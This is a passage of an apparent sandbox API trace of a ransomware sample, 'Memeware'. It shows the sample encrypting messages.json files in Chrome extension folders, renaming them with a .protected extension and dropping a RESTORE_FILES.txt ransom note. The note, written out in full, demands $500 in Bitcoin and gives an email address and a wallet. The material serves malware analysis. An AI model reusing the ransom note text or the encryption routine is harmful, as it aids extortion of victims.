lpOverlapped=0x0) returned 1 [0079.110] CloseHandle (hObject=0x164) returned 1 [0079.110] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.111] lstrcmpiW (lpString1="uk", lpString2="Windows") returned -1 [0079.111] lstrcmpiW (lpString1="uk", lpString2="Program Files") returned 1 [0079.111] lstrcmpiW (lpString1="uk", lpString2="Program Files (x86)") returned 1 [0079.111] lstrcmpiW (lpString1="uk", lpString2="$Recycle.bin") returned 1 [0079.111] lstrcmpiW (lpString1="uk", lpString2="System Volume Information") returned 1 [0079.111] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk") returned 141 [0079.111] lstrcmpW (lpString1="uk", lpString2=".") returned 1 [0079.111] lstrcmpW (lpString1="uk", lpString2="..") returned 1 [0079.111] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\*") returned 143 [0079.111] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.111] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.111] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.111] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.111] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.111] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.111] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | 
out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\.") returned 143 [0079.111] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.111] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.111] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.111] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.111] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.111] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.111] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.111] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\..") returned 144 [0079.111] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.111] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.111] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.111] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.111] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.111] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.112] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.112] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.112] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json") 
returned 155 [0079.112] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.112] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.112] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.112] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.112] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.113] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json") returned 155 [0079.113] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.113] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json") returned 155 [0079.113] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.113] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json") returned 155 [0079.113] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.113] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x108, lpOverlapped=0x0) returned 1 [0079.114] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffef8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.114] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x108, lpOverlapped=0x0) returned 1 [0079.114] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.114] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.114] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.114] CloseHandle (hObject=0x168) returned 1 [0079.114] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json.protected") returned 165 [0079.114] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json.protected")) returned 1 [0079.115] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.115] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.115] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\RESTORE_FILES.txt") returned 159 [0079.115] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.115] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.115] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.116] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.116] WriteFile (in: hFile=0x164, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.116] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.116] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.116] CloseHandle (hObject=0x164) returned 1 [0079.116] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.116] lstrcmpiW (lpString1="vi", lpString2="Windows") returned -1 [0079.117] lstrcmpiW (lpString1="vi", lpString2="Program Files") returned 1 [0079.117] lstrcmpiW (lpString1="vi", lpString2="Program Files (x86)") returned 1 [0079.117] lstrcmpiW (lpString1="vi", lpString2="$Recycle.bin") returned 1 [0079.117] lstrcmpiW (lpString1="vi", lpString2="System Volume Information") returned 1 [0079.117] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi") returned 141 [0079.117] lstrcmpW (lpString1="vi", lpString2=".") returned 1 [0079.117] lstrcmpW (lpString1="vi", lpString2="..") returned 1 [0079.117] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\*") returned 143 [0079.117] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.117] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.117] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.117] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.117] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.117] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.117] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\.") returned 143 [0079.117] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.117] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.117] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.117] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.117] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.117] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.117] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.117] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\..") returned 144 [0079.117] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.117] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.117] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.117] lstrcmpiW 
(lpString1="messages.json", lpString2="Windows") returned -1 [0079.117] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.118] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.118] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.118] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.118] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json") returned 155 [0079.118] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.118] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.118] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.118] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.118] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.118] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json") returned 155 [0079.118] StrStrW 
(lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.118] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json") returned 155 [0079.118] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.118] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json") returned 155 [0079.118] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.118] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xe1, lpOverlapped=0x0) returned 1 [0079.119] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff1f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.119] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xe1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xe1, lpOverlapped=0x0) returned 1 [0079.120] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.120] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.120] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.120] CloseHandle (hObject=0x168) returned 1 [0079.120] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, 
pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json.protected") returned 165 [0079.120] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json.protected")) returned 1 [0079.121] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.121] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.121] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\RESTORE_FILES.txt") returned 159 [0079.121] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.121] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.121] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.122] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.122] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.122] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.122] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.122] CloseHandle (hObject=0x164) returned 1 [0079.122] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.122] lstrcmpiW (lpString1="zh_CN", lpString2="Windows") returned 1 [0079.123] lstrcmpiW (lpString1="zh_CN", lpString2="Program Files") returned 1 [0079.123] lstrcmpiW (lpString1="zh_CN", lpString2="Program Files (x86)") returned 1 [0079.123] lstrcmpiW (lpString1="zh_CN", lpString2="$Recycle.bin") returned 1 [0079.123] lstrcmpiW (lpString1="zh_CN", lpString2="System Volume Information") returned 1 [0079.123] 
